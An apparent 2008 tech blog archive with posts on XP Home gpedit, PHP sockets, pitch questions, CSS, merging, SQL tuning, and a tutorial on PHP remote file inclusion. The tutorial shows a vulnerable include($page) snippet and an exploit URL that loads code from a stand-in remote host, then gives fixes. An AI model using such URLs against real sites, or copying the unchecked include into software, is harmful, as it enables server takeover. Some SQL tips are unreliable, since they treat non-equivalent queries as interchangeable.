Thursday, September 4, 2008

XP HOME local security

XP Home edition does not include the local security policy console (gpedit.msc). Here is a solution:
1. Copy gpedit.msc, fde.dll, gpedit.dll, gptext.dll and wsecedit.dll from “C:\WINDOWS\system32” on XP Pro to “C:\WINDOWS\system32” on Home.
2. Start -> Run, then run the following commands: “regsvr32 fde.dll”, “regsvr32 gpedit.dll”, “regsvr32 gptext.dll”, “regsvr32 wsecedit.dll”
3. Copy all the *.adm files from “C:\WINDOWS\INF” on XP Pro to “C:\WINDOWS\INF” on Home.
4. Last step: run “gpedit.msc” and you will see the security policy console.

Friday, February 29, 2008

PHP Socket Basic



<?php
// set some variables
$host = "192.168.1.99";
$port = 1234;
// don't timeout!
set_time_limit(0);
// create a TCP socket
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP) or die("Could not create socket\n");
// bind socket to address and port
$result = socket_bind($socket, $host, $port) or die("Could not bind to socket\n");
// start listening for connections (backlog of 3)
$result = socket_listen($socket, 3) or die("Could not set up socket listener\n");
// accept an incoming connection
// spawn another socket to handle communication
$spawn = socket_accept($socket) or die("Could not accept incoming connection\n");
// read client input; compare with false so that input such as "0" is not treated as an error
$input = socket_read($spawn, 1024);
if ($input === false) die("Could not read input\n");
// clean up input string
$input = trim($input);
// reverse client input and send back
$output = strrev($input) . "\n";
if (socket_write($spawn, $output, strlen($output)) === false) die("Could not write output\n");
// close sockets
socket_close($spawn);
socket_close($socket);
?>

Monday, February 11, 2008

Business Presentation Tips

http://www.feld.com/blog/archives/2004/06/the_torturous_w.html

Following are the questions to address.

1) WHAT IS YOUR VISION?
- What is your big vision?
- What problem are you solving and for whom?
- Where do you want to be in the future?

2) WHAT IS YOUR MARKET OPPORTUNITY AND HOW BIG IS IT?
- How big is the market opportunity you are pursuing and how fast is it growing?
- How established (or nascent) is the market?
- Do you have a credible claim on being one of the top two or three players in the market?

3) DESCRIBE YOUR PRODUCT/SERVICE
- What is your product/service?
- How does it solve your customer’s problem?
- What is unique about your product/service?

4) WHO IS YOUR CUSTOMER?
- Who are your existing customers?
- Who is your target customer?
- What defines an "ideal" customer prospect?
- Who actually writes you the check?
- Use specific customer examples where possible.

5) WHAT IS YOUR VALUE PROPOSITION?
- What is your value proposition to the customer?
- What kind of ROI can your customer expect by using or buying your product/service?
- What pain are you eliminating?
- Are you selling vitamins, aspirin or antibiotics? (I.e. a luxury, a nice-to-have, or a need-to-have)

6) HOW ARE YOU SELLING?
- What does the sales process look like and how long is the sales cycle?
- How will you reach the target customer? What does it cost to "acquire" a customer?
- What is your sales, marketing and distribution strategy?
- What is the current sales pipeline?

7) HOW DO YOU ACQUIRE CUSTOMERS?
- What is your cost to acquire a customer?
- How will this acquisition cost change over time and why?
- What is the lifetime value of a customer?

8) WHO IS YOUR MANAGEMENT TEAM?
- Who is the management team?
- What is their experience?
- What pieces are missing and what is the plan for filling them?

9) WHAT IS YOUR REVENUE MODEL?
- How do you make money?
- What is your revenue model?
- What is required to become profitable?

10) WHAT STAGE OF DEVELOPMENT ARE YOU AT?
- What is your stage of development? Technology/product? Team? Financial metrics/revenue?
- What has been the progress to date (make reality and future clear)?
- What are your future milestones?

11) WHAT ARE YOUR PLANS FOR FUND RAISING?
- What funds have already been raised?
- How much money are you raising and at what valuation?
- How will the money be spent?
- How long will it last and where will the company "be" on its milestones progress at that time?
- How much additional funding do you anticipate raising & when?

12) WHO IS YOUR COMPETITION?
- Who is your existing & likely competition?
- Who is adjacent to you (in the market) that could enter your market (and compete) or could be a co-opted partner?
- What are their strengths/weaknesses?
- Why are you different?

13) WHAT PARTNERSHIPS DO YOU HAVE?
- Who are your key distribution and technology partners (current & future)?
- How dependent are you on these partners?

14) HOW DO YOU FIT WITH THE PROSPECTIVE INVESTOR?
- How does this fit w/ the investor’s portfolio and expertise?
- What synergies, competition exist with the investor’s existing portfolio?

15) OTHER
- What assumptions are key to the success of the business?
- What "gotchas" could change the business overnight? New technologies, new market entrants, change in standards or regulations?
- What are your company’s weak links?

Monday, February 4, 2008

Make a container's border work!

div.container {
border: 1px solid #000000;
overflow: hidden;
width: 100%;
}

div.left {
width: 45%;
float: left;
}

div.right {
width: 45%;
float: right;
}

Friday, February 1, 2008

Code Injection Vulnerabilities Explained

Introduction:

There has been a sudden increase in attacks on sites that have Code Injection vulnerabilities. Code Injection is the term used when code is injected straight into a program/script from an outside source for execution at some point in time. These types of vulnerabilities may be many times worse than any other vulnerability, since the security of the website, and possibly of the server, is compromised.


Example:

This example will help you understand exactly what a Code Injection vulnerability looks like in its simplest form. Unfortunately, this snippet is actually used in quite a few websites.


... html header ...

<?php
include($page);
?>

... html footer ...

Note: There is no php code in the header or footer, it is just HTML.

To some, this is obviously a big mistake. The '$page' variable is never checked, so an attacker can choose what to include. So how does one exploit the above code?



Example Exploit:

An attacker can create a 'txt' file on another server and have it included in the above example. If the attacker puts php code in this 'txt' file, it will be executed on the exploited host.


<?php
phpinfo();
?>


Let's say the vulnerable code is located at 'http://domain/index.php', and the 'txt' file is located at 'http://domain2/code.txt', then the attacker would enter something like this into his browser:


http://domain/index.php?page=http://domain2/code.txt

The end result is that the exploited website executes the command 'phpinfo()' in between the header and footer, where the PHP include is located.





Explanation:

If you had no problem understanding why this would happen, feel free to skip this section.


The 'include()' function takes the contents of another file, named inside the brackets (), and places them at the point where the include is executed. So let us run through the program in our minds, and assume the URL mentioned above is entered into a browser. The URL defines the variable $page as containing 'http://domain2/code.txt' (PHP creates $page from the query string when register_globals is enabled), so let us replace every $page variable with this string:


... html header ...

<?php
include ('http://domain2/code.txt');
?>

... html footer ...

Now the include function takes the code from the url/file mentioned, and places it where the include was called, so the result would be:



... html header ...

<?php
phpinfo();
?>


... html footer ...

Now this is what the server ends up processing: the header is displayed, then the PHP command 'phpinfo()' is executed, followed by the footer at the end.



What can happen:

The above example had harmless code being executed, but the attacker can execute more malicious code.




  • An attacker can output the contents of any PHP file raw to the browser, where he can possibly obtain an SQL login/password to your database.
  • An attacker can use your website to send out large amounts of spam to various email addresses.
  • An attacker can deface your website.
  • An attacker can obtain private information.
  • An attacker may gain access to the whole server.


This is why it is important to secure your website, and not leave such vulnerabilities open for attack.



Solution:

There is a very simple solution to the above example, and that is to check the variable. In the above example, 99% of the time you know what values $page should be, and therefore can check to see if that is the case.



... html header ...

<?php
// list of valid pages
$pages = array("games/index.html", "news/news.html", "games/1.html");

// check the $page variable against the list; stop at the first match
$valid = false;
for ($i = 0; $i < sizeof($pages) && !$valid; $i++) {
    if ($page === $pages[$i]) {
        $valid = true;
    }
}
if ($valid) include($page);
if (!$valid) include($pages[0]); // include the first page if not valid
?>

... html footer ...


Another Solution:

Another solution is to strip invalid characters and keep all the page files together in a separate directory.


Example of where the pages are placed:



  • pages/games.html
  • pages/news.html
  • pages/games-1.html



Code:
... html header ...

<?php
$invalidChars=array("/",".","\\","\"",";");
$page=str_replace($invalidChars,"",$page);
include ("pages/".$page.".html");
?>

... html footer ...
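
The two solutions above combined into a single allowlist lookup, as an added example that is not part of the original post: the request supplies only a key, so no request data ever reaches the path given to include. The page keys, DEFAULT_PAGE, resolve_page() and the pages/ directory are assumptions made for illustration.

```php
<?php
// Added example (not from the original post). Keys, file names and the
// pages/ directory are constructed for illustration.

// Allowlist map: the request supplies a key, the server supplies the file name.
const PAGES = [
    'games'   => 'games.html',
    'news'    => 'news.html',
    'games-1' => 'games-1.html',
];
const DEFAULT_PAGE = 'games';

// Return the file to include for a requested key; anything that is not an
// exact key of PAGES (URLs, paths, arrays, null) falls back to the default.
function resolve_page($requested, string $baseDir): string
{
    $key = (is_string($requested) && array_key_exists($requested, PAGES))
        ? $requested
        : DEFAULT_PAGE;
    return rtrim($baseDir, '/') . '/' . PAGES[$key];
}

// Constructed inputs: one valid key, the remote URL from the example exploit,
// a path, an unknown key, and the non-string values that ?page[]=news and a
// missing parameter produce.
$samples = ['news', 'http://domain2/code.txt', '../index', 'admin', ['news'], null];
foreach ($samples as $sample) {
    printf("%-30s => %s\n",
        json_encode($sample, JSON_UNESCAPED_SLASHES),
        resolve_page($sample, __DIR__ . '/pages'));
}

// In the template itself the call would be:
// include resolve_page(isset($_GET['page']) ? $_GET['page'] : null, __DIR__ . '/pages');
```

Only the first sample resolves to pages/news.html; every other input resolves to the default page. Independently of the allowlist, leaving allow_url_include off in php.ini (its default since PHP 5.2) stops include() from fetching http:// URLs at all.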

Saturday, January 19, 2008

Merge in Source Control

In theory, this could be very difficult:

* What happens if Jane changed some of the same lines that Joe changed, but in different ways?
* What happens if Jane's changes are functionally incompatible with Joe's?
* What happens if Jane made a change to a C# function which Joe has deleted?
* What happens if Jane changed 80 percent of the lines in the file?
* What happens if Jane and Joe each changed 80 percent of the lines in the file, but each did so for entirely different reasons?
* What happens if Jane's intent was not clear and she cannot be reached to ask questions?

Friday, January 18, 2008

SQL Performance

* One: only "tune" sql after code is confirmed as working correctly.

* Two: ensure repeated sql statements are written absolutely identically to facilitate efficient reuse: re-parsing can often be avoided for each subsequent use.

Writing best practices: all sql verbs in upper-case i.e. SELECT; separate all words with a single space; all sql verbs begin on a new line; sql verbs aligned right or left within the initial verb; set and maintain a table alias standard; use table aliases and when a query involves more than one table prefix all column names with their aliases. Whatever you do, be consistent.

* Three: code the query as simply as possible i.e. no unnecessary columns are selected, no unnecessary GROUP BY or ORDER BY.

* Four: it is the same or faster to SELECT by actual column name(s). The larger the table the more likely the savings.
Use:
SELECT customer_id, last_name, first_name, street, city FROM customer;
Rather than:
SELECT * FROM customer;

* Five: do not perform operations on DB objects referenced in the WHERE clause:
Use:
SELECT client, date, amount FROM sales WHERE amount > 0;
Rather than:
SELECT client, date, amount FROM sales WHERE amount!= 0;

* Six: avoid a HAVING clause in SELECT statements - it only filters selected rows after all the rows have been returned. Use HAVING only when summary operations applied to columns will be restricted by the clause. A WHERE clause may be more efficient.
Use:
SELECT city FROM country WHERE city!= 'Vancouver' AND city!= 'Toronto' GROUP BY city;
Rather than:
SELECT city FROM country GROUP BY city HAVING city!= 'Vancouver' AND city!= 'Toronto';

* Seven: when writing a sub-query (a SELECT statement within the WHERE or HAVING clause of another sql statement):
-- use a correlated (refers to at least one value from the outer query) sub-query when the return is relatively small and/or other criteria are efficient i.e. if the tables within the sub-query have efficient indexes.
-- use a noncorrelated (does not refer to the outer query) sub-query when dealing with large tables from which you expect a large return (many rows) and/or if the tables within the sub-query do not have efficient indexes.
-- ensure that multiple sub-queries are in the most efficient order.
-- remember that rewriting a sub-query as a join can sometimes increase efficiency.

* Eight: minimise the number of table lookups especially if there are sub-query SELECTs or multicolumn UPDATEs.

* Nine: when doing multiple table joins consider the benefits/costs for each of EXISTS, IN, and table joins. Depending on your data one or another may be faster.
Note: IN is usually the slowest.
Note: when most of the filter criteria are in the sub-query IN may be more efficient; when most of the filter criteria are in the parent-query EXISTS may be more efficient.

* Ten: where possible use EXISTS rather than DISTINCT.

* Eleven: where possible use a non-column expression (putting the column on one side of the operator and all the other values on the other). Non-column expressions are often processed earlier thereby speeding the query.
Use:
WHERE SALES < 1000/(1 + n);
Rather than:
WHERE SALES + (n * SALES) < 1000;

* Twelve: the most efficient method for storing large binary objects, i.e. multimedia objects, is to place them in the file system and place a pointer in the DB.

* Thirteen: Use inner joins rather than left/right/cross joins

* Fourteen: In most cases, GROUP+HAVING < WHERE